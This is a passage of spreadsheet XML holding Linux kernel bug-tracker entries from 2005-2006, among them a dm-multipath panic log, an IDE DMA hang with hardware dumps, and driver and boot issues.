setup node 0 0000000000000000-000000000009fc00 PANIC: early exception rip 10 error ffffffff805e1e9d cr2 0 PANIC: early exception rip ffffffff8011910c error 0 cr2 ffffffffff5fd023 teps to reproduce: Boot kernel :)</t>
  </si>
  <si>
    <t>no sound recording with latest bttv driver</t>
  </si>
  <si>
    <t>bt8xx</t>
  </si>
  <si>
    <t>2.6.15-rc4-git1</t>
  </si>
  <si>
    <t>2005-12-19 12:40 UTC</t>
  </si>
  <si>
    <t>2006-11-14 10:23 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.15-rc4 Distribution: Slackware 10.1 Hardware Environment: ALi M5455 onboard chipset Software Environment: gcc 3.4.4 glibc 2.3.5 Problem Description: Driver crash if included in the kernel, and is deactivated as module. Unable to play and record any sound. Steps to reproduce: Boot 2.6.15-rc6 on described hardware Appended lspci and dmesg output.</t>
  </si>
  <si>
    <t>replace spin_lock_irq with mutex for ec poll mode</t>
  </si>
  <si>
    <t>2.6.15-rc5-len-acpi-test git tree</t>
  </si>
  <si>
    <t>2005-12-19 23:00 UTC</t>
  </si>
  <si>
    <t>2006-06-25 21:36 UTC</t>
  </si>
  <si>
    <t>when a scsi device is plugged in again, the kernel with dm-multipath paniced</t>
  </si>
  <si>
    <t>2.6.14.2 smp bigmem</t>
  </si>
  <si>
    <t>2005-12-22 19:50 UTC</t>
  </si>
  <si>
    <t>Luckey</t>
  </si>
  <si>
    <t>2007-11-13 04:30 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: none Distribution: centos 4.2 Hardware Environment: SAN storage, the HBA card is drived by module: qla2xxx, qla2300 Software Environment: kernel 2.6.14.2 smp bigmem device-mapper.1.01.05 multipath-tools-0.4.6 udev-058-1 Problem Description: I create the dm device as: create: 3600d0230006927de000001618fecaf00 [size=476 GB][features="0"][hwhandler="0"] \_ round-robin 0 [prio=1] \_ 0:0:0:0 sda 8:0 [undef] [ready] \_ round-robin 0 [prio=1] \_ 1:0:0:0 sdb 8:16 [undef] [ready] Then, I try the command: dd if=/dev/dm-0 of=/dev/null I see only the device /dev/sda was readed. It's OK. but when I pull out the HBA which related to /dev/sdb for about 1 minute,and then plug it in again, the kernel panics. the messages are as follows: Dec 22 05:25:07 nd02 kernel: qla2300 0000:07:01.1: LIP reset occured (f823). Dec 22 05:25:07 nd02 kernel: qla2300 0000:07:01.1: LIP occured (f823). Dec 22 05:25:07 nd02 kernel: qla2300 0000:07:01.1: LOOP DOWN detected (2). Dec 22 05:25:42 nd02 kernel: rport-1:0-1: blocked FC remote port time out: removing target Dec 22 05:25:42 nd02 multipathd: 8:16: readsector0 checker reports path is down Dec 22 05:25:42 nd02 multipathd: checker failed path 8:16 in map 3600d0230006927de000001618fecaf00 Dec 22 05:25:42 nd02 kernel: device-mapper: dm-multipath: Failing path 8:16. Dec 22 05:25:42 nd02 multipathd: 3600d0230006927de000001618fecaf00: remaining active paths: 1 Dec 22 05:25:43 nd02 multipathd: remove sdb path checker Dec 22 05:25:43 nd02 kernel: Synchronizing SCSI cache for disk sdb: Dec 22 05:25:43 nd02 kernel: FAILED Dec 22 05:25:43 nd02 kernel: status = 0, message = 00, host = 1, driver = 00 Dec 22 05:26:12 nd02 kernel: &lt;6&gt;qla2300 0000:07:01.1: LIP reset occured (f8f7). Dec 22 05:26:12 nd02 kernel: qla2300 0000:07:01.1: LIP occured (f8f7). Dec 22 05:26:12 nd02 kernel: qla2300 0000:07:01.1: LOOP UP detected (2 Gbps). Dec 22 05:26:13 nd02 kernel: Vendor: TOYOU Model: NetStor DA9220F Rev: 342R Dec 22 05:26:13 nd02 kernel: Type: Direct-Access ANSI SCSI revision: 03 Dec 22 05:26:13 nd02 kernel: SCSI device sdc: 999950336 512-byte hdwr sectors (511975 MB) Dec 22 05:26:13 nd02 kernel: SCSI device sdc: drive cache: write back Dec 22 05:26:13 nd02 kernel: SCSI device sdc: 999950336 512-byte hdwr sectors (511975 MB) Dec 22 05:26:14 nd02 kernel: SCSI device sdc: drive cache: write back Dec 22 05:26:14 nd02 kernel: sdc: Dec 22 05:26:14 nd02 kernel: Attached scsi disk sdc at scsi1, channel 0, id 0, lun 0 Dec 22 05:26:14 nd02 kernel: Attached scsi generic sg1 at scsi1, channel 0, id 0, lun 0, type 0 Dec 22 05:26:14 nd02 scsi.agent[4098]: disk at /devices/pci0000:00/0000:00:02.0/0000:05:1d.0/0000:07:01.1/host1/rport-1:0- 1/target1:0:0/1:0:0:0 ---------------------&gt;&gt; All right above here. Dec 22 05:26:14 nd02 kernel: Vendor: TOYOU Model: NetStor DA9220F Rev: 342R Dec 22 05:26:14 nd02 kernel: Type: Direct-Access ANSI SCSI revision: 03 Dec 22 05:26:14 nd02 kernel: error 1 Dec 22 05:26:14 nd02 kernel: scsi: Unexpected response from host 1 channel 0 id 0 lun 0 while scanning, scan aborted Dec 22 05:26:14 nd02 kernel: Badness in kref_get at lib/kref.c:32 Dec 22 05:26:14 nd02 kernel: [&lt;c01d9c6a&gt;] kref_get+0x3f/0x41 Dec 22 05:26:14 nd02 kernel: [&lt;c01d92e0&gt;] kobject_get+0x17/0x1e Dec 22 05:26:14 nd02 kernel: [&lt;c019d896&gt;] sysfs_getlink+0x38/0xfa Dec 22 05:26:14 nd02 kernel: [&lt;c019d999&gt;] sysfs_follow_link+0x41/0x59 Dec 22 05:26:14 nd02 kernel: [&lt;c016ee2f&gt;] generic_readlink+0x2a/0x85 Dec 22 05:26:14 nd02 kernel: [&lt;c017fc72&gt;] __mark_inode_dirty+0x52/0x1a8 Dec 22 05:26:14 nd02 kernel: [&lt;c012332f&gt;] current_fs_time+0x59/0x67 Dec 22 05:26:14 nd02 kernel: [&lt;c0177e61&gt;] update_atime+0x67/0x8c Dec 22 05:26:14 nd02 kernel: [&lt;c01674b5&gt;] sys_readlink+0x7e/0x82 Dec 22 05:26:14 nd02 kernel: [&lt;c0103af3&gt;] sysenter_past_esp+0x54/0x75 Dec 22 05:26:17 nd02 kernel: Unable to handle kernel paging requestBadness in kref_get at lib/kref.c:32 Dec 22 05:26:17 nd02 kernel: [&lt;c01d9c6a&gt;] kref_get+0x3f/0x41 Dec 22 05:26:17 nd02 kernel: [&lt;c01d92e0&gt;] kobject_get+0x17/0x1e Dec 22 05:26:17 nd02 kernel: [&lt;c019d896&gt;] sysfs_getlink+0x38/0xfa Dec 22 05:26:17 nd02 kernel: [&lt;c019d999&gt;] sysfs_follow_link+0x41/0x59 Dec 22 05:26:17 nd02 kernel: [&lt;c016ee2f&gt;] generic_readlink+0x2a/0x85 Dec 22 05:26:17 nd02 kernel: [&lt;c012332f&gt;] current_fs_time+0x59/0x67 Dec 22 05:26:17 nd02 kernel: [&lt;c0177e61&gt;] update_atime+0x67/0x8c Dec 22 05:26:17 nd02 kernel: [&lt;c01674b5&gt;] sys_readlink+0x7e/0x82 Dec 22 05:26:17 nd02 kernel: [&lt;c0103af3&gt;] sysenter_past_esp+0x54/0x75 Dec 22 05:26:17 nd02 kernel: at virtual address 00200200 Dec 22 05:26:17 nd02 kernel: printing eip: Dec 22 05:26:17 nd02 kernel: c02583a1 Dec 22 05:26:17 nd02 kernel: *pde = 37eb7001 Dec 22 05:26:17 nd02 kernel: Oops: 0002 [#1] Dec 22 05:26:17 nd02 kernel: SMP Dec 22 05:26:17 nd02 kernel: Modules linked in: dm_round_robin dm_multipath binfmt_misc dm_mirror dm_mod video thermal proces sor fan button battery ac uhci_hcd usbcore hw_random shpchp pci_hotplug e1000 qla2300 qla2xxx scsi_transport_fc sd_mod Dec 22 05:26:17 nd02 kernel: CPU: 1 Dec 22 05:26:17 nd02 kernel: EIP: 0060:[&lt;c02583a1&gt;] Not tainted VLI Dec 22 05:26:17 nd02 kernel: EFLAGS: 00010002 (2.6.14.2smp) Dec 22 05:26:17 nd02 kernel: EIP is at scsi_device_dev_release+0x3d/0x113 Dec 22 05:26:17 nd02 kernel: eax: 00100100 ebx: c2c03194 ecx: 00200200 edx: 00000286 Dec 22 05:26:17 nd02 kernel: esi: c2c03008 edi: c2c03000 ebp: c229d814 esp: d326fe68 Dec 22 05:26:17 nd02 kernel: ds: 007b es: 007b ss: 0068 Dec 22 05:26:17 nd02 kernel: Process udev (pid: 4108, threadinfo=d326e000 task=f6e3ca30) Dec 22 05:26:17 nd02 kernel: Stack: 7f7e7d7c c2c0320c c0371b08 c0371b20 c229d88c c01d935e c2c03194 c2c03224 Dec 22 05:26:17 nd02 kernel: c01d9362 c03754b8 c2c0320c c01d9c9e c2c0320c c019d854 c03754b8 ef1ac000 Dec 22 05:26:17 nd02 kernel: c0365040 00000000 c01d938a c2c03224 c01d9362 c019d927 c2c0320c c03754b8 Dec 22 05:26:17 nd02 kernel: Call Trace: Dec 22 05:26:17 nd02 kernel: [&lt;c01d935e&gt;] kobject_cleanup+0x77/0x7b Dec 22 05:26:17 nd02 kernel: [&lt;c01d9362&gt;] kobject_release+0x0/0xa Dec 22 05:26:17 nd02 kernel: [&lt;c01d9c9e&gt;] kref_put+0x32/0x84 Dec 22 05:26:17 nd02 kernel: [&lt;c019d854&gt;] sysfs_get_target_path+0x73/0x7d Dec 22 05:26:17 nd02 kernel: [&lt;c01d938a&gt;] kobject_put+0x1e/0x22 Dec 22 05:26:17 nd02 kernel: [&lt;c01d9362&gt;] kobject_release+0x0/0xa Dec 22 05:26:17 nd02 kernel: [&lt;c019d927&gt;] sysfs_getlink+0xc9/0xfa Dec 22 05:26:17 nd02 kernel: [&lt;c019d999&gt;] sysfs_follow_link+0x41/0x59 Dec 22 05:26:17 nd02 kernel: [&lt;c016ee2f&gt;] generic_readlink+0x2a/0x85 Dec 22 05:26:17 nd02 kernel: [&lt;c017fc72&gt;] __mark_inode_dirty+0x52/0x1a8 Dec 22 05:26:17 nd02 kernel: [&lt;c012332f&gt;] current_fs_time+0x59/0x67 Dec 22 05:26:17 nd02 kernel: [&lt;c0177e61&gt;] update_atime+0x67/0x8c Dec 22 05:26:17 nd02 kernel: [&lt;c01674b5&gt;] sys_readlink+0x7e/0x82 Dec 22 05:26:17 nd02 kernel: [&lt;c0103af3&gt;] sysenter_past_esp+0x54/0x75 Dec 22 05:26:17 nd02 kernel: Code: ff ff 8d bb 6c fe ff ff 8d 75 ec 8b 40 2c e8 cc df 0a 00 83 86 34 01 00 00 01 8d b3 74 fe ff ff 8b 4e 04 89 c2 8b 83 74 fe ff ff &lt;89&gt; 01 89 48 04 c7 46 04 00 02 20 00 8d b3 7c fe ff ff 8b 83 7c Dec 22 05:26:19 nd02 multipathd: sdc: path checker registered In summary: kernel with module dm_multipath loaded: When I plug in the HBA card, the kernel finds a new device named "/dev/sdc" which is "/dev/sdb" orginally, and then kernel painc. kernel without module dm_multipath loaded: When I plug in the HBA card, the kernel finds a new device named as the old one "/dev/sdb", and all works fine. What's the matter? where would be the bug ? Steps to reproduce: create the dm multipath device, pull out one HBA card for 1 minute, and plug it in again.</t>
  </si>
  <si>
    <t>Should check if kmalloc succeeds</t>
  </si>
  <si>
    <t>2005-12-23 01:43 UTC</t>
  </si>
  <si>
    <t>Daniel Marjam</t>
  </si>
  <si>
    <t>2006-01-16 04:53 UTC</t>
  </si>
  <si>
    <t>Problem Description: In the file file.c at line 193 there is a kmalloc. I believe the return value isn't checked.</t>
  </si>
  <si>
    <t>2.6.15-rc7</t>
  </si>
  <si>
    <t>DMA access to CD-writer hangs IDE bus</t>
  </si>
  <si>
    <t>2.6.12-1 and later</t>
  </si>
  <si>
    <t>2005-12-27 03:27 UTC</t>
  </si>
  <si>
    <t>Enrico Colombini</t>
  </si>
  <si>
    <t>2006-12-02 01:39 UTC</t>
  </si>
  <si>
    <t>Michael De Backer</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.4.22 (Knoppix 3.3, sg driver 3.1.25, libscg 'schily 0.7') Distribution: Debian Etch (2.6.12), Fedora Core 4 (2.6.12 and 2.6.14), SuSE 9.3, Knoppix 4.02 Hardware Environment: Acer T630, Pentium 4 3.2 GHz, SATA HD [sata_uli], ALi M5229 rev c7 IDE controller [alim15x3] Software Environment: cdrecord (tried different versions) (note: cdrecord compiled from the same source works fine in cygwin) Problem Description: I can read from the CD drives, but when cdrecord issues the "read_dvd_structure" command with a CD-RW in the drive and DMA mode active for that drive (any DMA mode) the IDE bus hangs (details below); when the timeout expires it logs: ide-cd: cmd 0x3 timed out hdc: lost interrupt Both IDE-connected drives become inaccessible until reboot. I think this problem could be related to bug #4514 filed by Jeff Wiegley: our machines share the ALi M5229 rev c7 controller. Steps to reproduce: cdrecord dev=ATA:1,0,0 -checkdrive Notes: I originally filed this as a possible cdrecord bug (http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=338909) but: - Joerg Schilling says it's definitely not a cdrecord problem - cdrecord from the same source works fine under cygwin - cdrecord works fine under 2.4.22 (but I can't use the SATA HD) - it hangs in the middle of a SG_IO command I did some tracing by inserting printk() in the 2.6.12 kernel: the program gets stuck inside wait_for_completion() (kernel/sched.c) called by blk_execute_rq() (drivers/block/ll_rw_blk.c). However, ide_intr() (drivers/ide/ide-io.c) gets called *and returns* IRQ_HANDLED. wait_for_completion() continues waiting. Being a total newbie to kernel programming, I'd appreciate suggestions about further testing and analysis. (I also tried disabling acpi, to no avail) --- system and environment details ------------------------- /proc/cpuinfo: processor : 0 vendor_id : GenuineIntel cpu family : 15 model : 4 model name : Intel(R) Pentium(R) 4 CPU 3.20GHz stepping : 1 cpu MHz : 3200.918 cache size : 1024 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 5 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx pni monitor ds_cpl cid xtpr bogomips : 6307.84 ----------- /proc/lspci: 0000:00:00.0 Host bridge: ATI Technologies Inc: Unknown device 5a33 (rev 01) Subsystem: Acer Incorporated [ALI]: Unknown device 007d Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- Latency: 32 Region 2: I/O ports at d000 [disabled] [size=32] Region 3: Memory at &lt;ignored&gt; (64-bit, non-prefetchable) 0000:00:02.0 PCI bridge: ATI Technologies Inc RS480 PCI-X Root Port (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0, Cache Line Size: 0x08 (32 bytes) Bus: primary=00, secondary=01, subordinate=01, sec-latency=0 I/O behind bridge: 0000f000-00000fff Memory behind bridge: d0000000-d2ffffff Prefetchable memory behind bridge: c0000000-cfffffff BridgeCtl: Parity- SERR- NoISA+ VGA+ MAbort- &gt;Reset- FastB2B- Capabilities: [50] Power Management version 3 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [58] #10 [0041] Capabilities: [80] Message Signalled Interrupts: 64bit- Queue=0/0 Enable+ Address: fee01004 Data: 40b1 Capabilities: [b0] #0d [0000] Capabilities: [b8] #08 [a803] 0000:00:19.0 PCI bridge: ALi Corporation M5249 HTT to PCI Bridge (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- Latency: 0 Bus: primary=00, secondary=02, subordinate=02, sec-latency=32 I/O behind bridge: 0000c000-0000cfff Memory behind bridge: d3000000-d4ffffff Prefetchable memory behind bridge: fff00000-000fffff BridgeCtl: Parity- SERR- NoISA+ VGA- MAbort- &gt;Reset- FastB2B- Capabilities: [c0] #08 [a803] 0000:00:1c.0 USB Controller: ALi Corporation USB 1.1 Controller (rev 03) (prog-if 10 [OHCI]) Subsystem: Acer Incorporated [ALI]: Unknown device 007d Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR+ Latency: 32 (20000ns max), Cache Line Size: 0x08 (32 bytes) Interrupt: pin A routed to IRQ 193 Region 0: Memory at d5007000 (32-bit, non-prefetchable) [size=4K] 0000:00:1c.1 USB Controller: ALi Corporation USB 1.1 Controller (rev 03) (prog-if 10 [OHCI]) Subsystem: Acer Incorporated [ALI]: Unknown device 007d Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR+ Latency: 32 (20000ns max), Cache Line Size: 0x08 (32 bytes) Interrupt: pin B routed to IRQ 193 Region 0: Memory at d5004000 (32-bit, non-prefetchable) [size=4K] 0000:00:1c.2 USB Controller: ALi Corporation USB 1.1 Controller (rev 03) (prog-if 10 [OHCI]) Subsystem: Acer Incorporated [ALI]: Unknown device 007d Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR+ Latency: 32 (20000ns max), Cache Line Size: 0x08 (32 bytes) Interrupt: pin C routed to IRQ 193 Region 0: Memory at d5005000 (32-bit, non-prefetchable) [size=4K] 0000:00:1c.3 USB Controller: ALi Corporation USB 2.0 Controller (rev 01) (prog-if 20 [EHCI]) Subsystem: Acer Incorporated [ALI]: Unknown device 007d Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR+ Latency: 32 (4000ns min, 8000ns max) Interrupt: pin D routed to IRQ 193 Region 0: Memory at d5006000 (32-bit, non-prefetchable) [size=256] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [58] #0a [2090] 0000:00:1d.0 0403: ALi Corporation High Definition Audio/AC'97 Host Controller Subsystem: Acer Incorporated [ALI]: Unknown device 007d Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (4000ns min, 20000ns max) Interrupt: pin C routed to IRQ 11 Region 0: Memory at d5000000 (64-bit, non-prefetchable) [size=16K] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=55mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:1e.0 ISA bridge: ALi Corporation PCI to LPC Controller (rev 31) Subsystem: Acer Incorporated [ALI]: Unknown device 007d Control: I/O+ Mem+ BusMaster+ SpecCycle+ MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (250ns min, 6000ns max) 0000:00:1e.1 Bridge: ALi Corporation M7101 Power Management Controller [PMU] Subsystem: Acer Incorporated [ALI]: Unknown device 007d Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- 0000:00:1f.0 IDE interface: ALi Corporation M5229 IDE (rev c7) (prog-if fa) Subsystem: Acer Incorporated [ALI]: Unknown device 007d Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32, Cache Line Size: 0x08 (32 bytes) Interrupt: pin A routed to IRQ 185 Region 4: I/O ports at f000 [size=16] 0000:00:1f.1 RAID bus controller: ALi Corporation ULi 5287 SATA (rev 02) Subsystem: Acer Incorporated [ALI]: Unknown device 007d Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32, Cache Line Size: 0x80 (512 bytes) Interrupt: pin A routed to IRQ 185 Region 0: I/O ports at d400 [size=16] Region 1: I/O ports at d800 [size=8] Region 2: I/O ports at dc00 [size=16] Region 3: I/O ports at e000 [size=8] Region 4: I/O ports at e400 [size=32] Region 5: Memory at d5008000 (32-bit, non-prefetchable) [size=1K] Capabilities: [60] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot+,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME+ 0000:01:00.0 VGA compatible controller: nVidia Corporation GeForce 6200 TurboCache(TM) (rev a1) (prog-if 00 [VGA]) Subsystem: LeadTek Research Inc.: Unknown device d833 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0, Cache Line Size: 0x08 (32 bytes) Interrupt: pin A routed to IRQ 5 Region 0: Memory at d0000000 (32-bit, non-prefetchable) [size=16M] Region 1: Memory at c0000000 (64-bit, prefetchable) [size=256M] Region 3: Memory at d1000000 (64-bit, non-prefetchable) [size=16M] Capabilities: [60] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [68] Message Signalled Interrupts: 64bit+ Queue=0/0 Enable- Address: 0000000000000000 Data: 0000 Capabilities: [78] #10 [0001] 0000:02:11.0 Communication controller: Agere Systems V.92 56K WinModem (rev 03) Subsystem: Agere Systems: Unknown device 044c Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (63000ns min, 3500ns max) Interrupt: pin A routed to IRQ 10 Region 0: Memory at d4001000 (32-bit, non-prefetchable) [size=256] Region 1: I/O ports at c000 [size=8] Region 2: I/O ports at c400 [size=256] Capabilities: [f8] Power Management version 2 Flags: PMEClk- DSI+ D1- D2+ AuxCurrent=160mA PME(D0-,D1-,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:02:15.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8169 Gigabit Ethernet (rev 10) Subsystem: Acer Incorporated [ALI]: Unknown device 007d Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64 (8000ns min, 16000ns max), Cache Line Size: 0x20 (128 bytes) Interrupt: pin A routed to IRQ 201 Region 0: I/O ports at c800 [size=256] Region 1: Memory at d4000000 (32-bit, non-prefetchable) [size=256] Capabilities: [dc] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0-,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- ------------ /proc/modules: ipv6 237504 6 - Live 0xf89fa000 af_packet 21256 2 - Live 0xf89ae000 ide_generic 1408 0 [permanent], Live 0xf881b000 ide_disk 16768 0 - Live 0xf8999000 usbhid 33504 0 - Live 0xf89a4000 wacom 13184 0 - Live 0xf88fd000 r8169 24460 0 - Live 0xf88f6000 i2c_ali1535 7044 0 - Live 0xf88d2000 joydev 9664 0 - Live 0xf88e9000 evdev 9344 0 - Live 0xf88db000 mousedev 11424 1 - Live 0xf88d7000 psmouse 27140 0 - Live 0xf8915000 i2c_ali15x3 7428 0 - Live 0xf8892000 parport_pc 34116 0 - Live 0xf88df000 parport 33608 1 parport_pc, Live 0xf88c0000 floppy 56660 0 - Live 0xf8906000 pci_hotplug 26164 0 - Live 0xf88ca000 serio_raw 6916 0 - Live 0xf888f000 i2c_core 20752 2 i2c_ali1535,i2c_ali15x3, Live 0xf8836000 ehci_hcd 32008 0 - Live 0xf8895000 ohci_hcd 19972 0 - Live 0xf8885000 ati_agp 8588 0 - Live 0xf8832000 agpgart 33224 1 ati_agp, Live 0xf887b000 pcspkr 3524 0 - Live 0xf881d000 rtc 11960 0 - Live 0xf8820000 ext3 125320 1 - Live 0xf88a0000 jbd 51352 1 ext3, Live 0xf883d000 usb_storage 68416 0 - Live 0xf8869000 usbcore 110332 6 usbhid,wacom,ehci_hcd,ohci_hcd,usb_storage, Live 0xf884d000 unix 26160 370 - Live 0xf8824000 ------------- /proc/iomem: 00000000-0009fbff : System RAM 0009fc00-0009ffff : reserved 000a0000-000bffff : Video RAM area 000c0000-000c7fff : Video ROM 000d8000-000d9fff : Adapter ROM 000f0000-000fffff : System ROM 00100000-3ffeffff : System RAM 00100000-002bf75b : Kernel code 002bf75c-0039a37f : Kernel data 3fff0000-3fff2fff : ACPI Non-volatile Storage 3fff3000-3fffffff : ACPI Tables c0000000-cfffffff : PCI Bus #01 c0000000-cfffffff : 0000:01:00.0 d0000000-d2ffffff : PCI Bus #01 d0000000-d0ffffff : 0000:01:00.0 d1000000-d1ffffff : 0000:01:00.0 d3000000-d4ffffff : PCI Bus #02 d4000000-d40000ff : 0000:02:15.0 d4000000-d40000ff : r8169 d4001000-d40010ff : 0000:02:11.0 d5000000-d5003fff : 0000:00:1d.0 d5004000-d5004fff : 0000:00:1c.1 d5004000-d5004fff : ohci_hcd d5005000-d5005fff : 0000:00:1c.2 d5005000-d5005fff : ohci_hcd d5006000-d50060ff : 0000:00:1c.3 d5006000-d50060ff : ehci_hcd d5007000-d5007fff : 0000:00:1c.0 d5007000-d5007fff : ohci_hcd d5008000-d50083ff : 0000:00:1f.1 d5008000-d50083ff : sata_uli e0000000-efffffff : reserved fec00000-ffffffff : reserved ----------- /proc/ioports: 0000-001f : dma1 0020-0021 : pic1 0040-0043 : timer0 0050-0053 : timer1 0060-006f : keyboard 0070-0077 : rtc 0080-008f : dma page reg 00a0-00a1 : pic2 00c0-00df : dma2 00f0-00ff : fpu 0170-0177 : ide1 02f8-02ff : serial 0376-0376 : ide1 0378-037a : parport0 03c0-03df : vga+ 03f8-03ff : serial 1000-103f : 0000:00:1e.1 1000-1003 : PM1a_EVT_BLK 1004-1005 : PM1a_CNT_BLK 1008-100b : PM_TMR 1018-1027 : GPE0_BLK 1080-10ff : motherboard c000-cfff : PCI Bus #02 c000-c007 : 0000:02:11.0 c400-c4ff : 0000:02:11.0 c800-c8ff : 0000:02:15.0 c800-c8ff : r8169 d000-d01f : 0000:00:00.0 d400-d40f : 0000:00:1f.1 d400-d40f : sata_uli d800-d807 : 0000:00:1f.1 d800-d807 : sata_uli dc00-dc0f : 0000:00:1f.1 dc00-dc0f : sata_uli e000-e007 : 0000:00:1f.1 e000-e007 : sata_uli e400-e41f : 0000:00:1f.1 e400-e41f : sata_uli f000-f00f : 0000:00:1f.0 f000-f007 : ide0 f008-f00f : ide1</t>
  </si>
  <si>
    <t>ASUS A6k Notebook hangs on boot while initializing ehci_hcd</t>
  </si>
  <si>
    <t>2.6.12-2.6.15-rc5</t>
  </si>
  <si>
    <t>2005-12-27 12:32 UTC</t>
  </si>
  <si>
    <t>Christoph Goesgens</t>
  </si>
  <si>
    <t>2007-03-07 23:27 UTC</t>
  </si>
  <si>
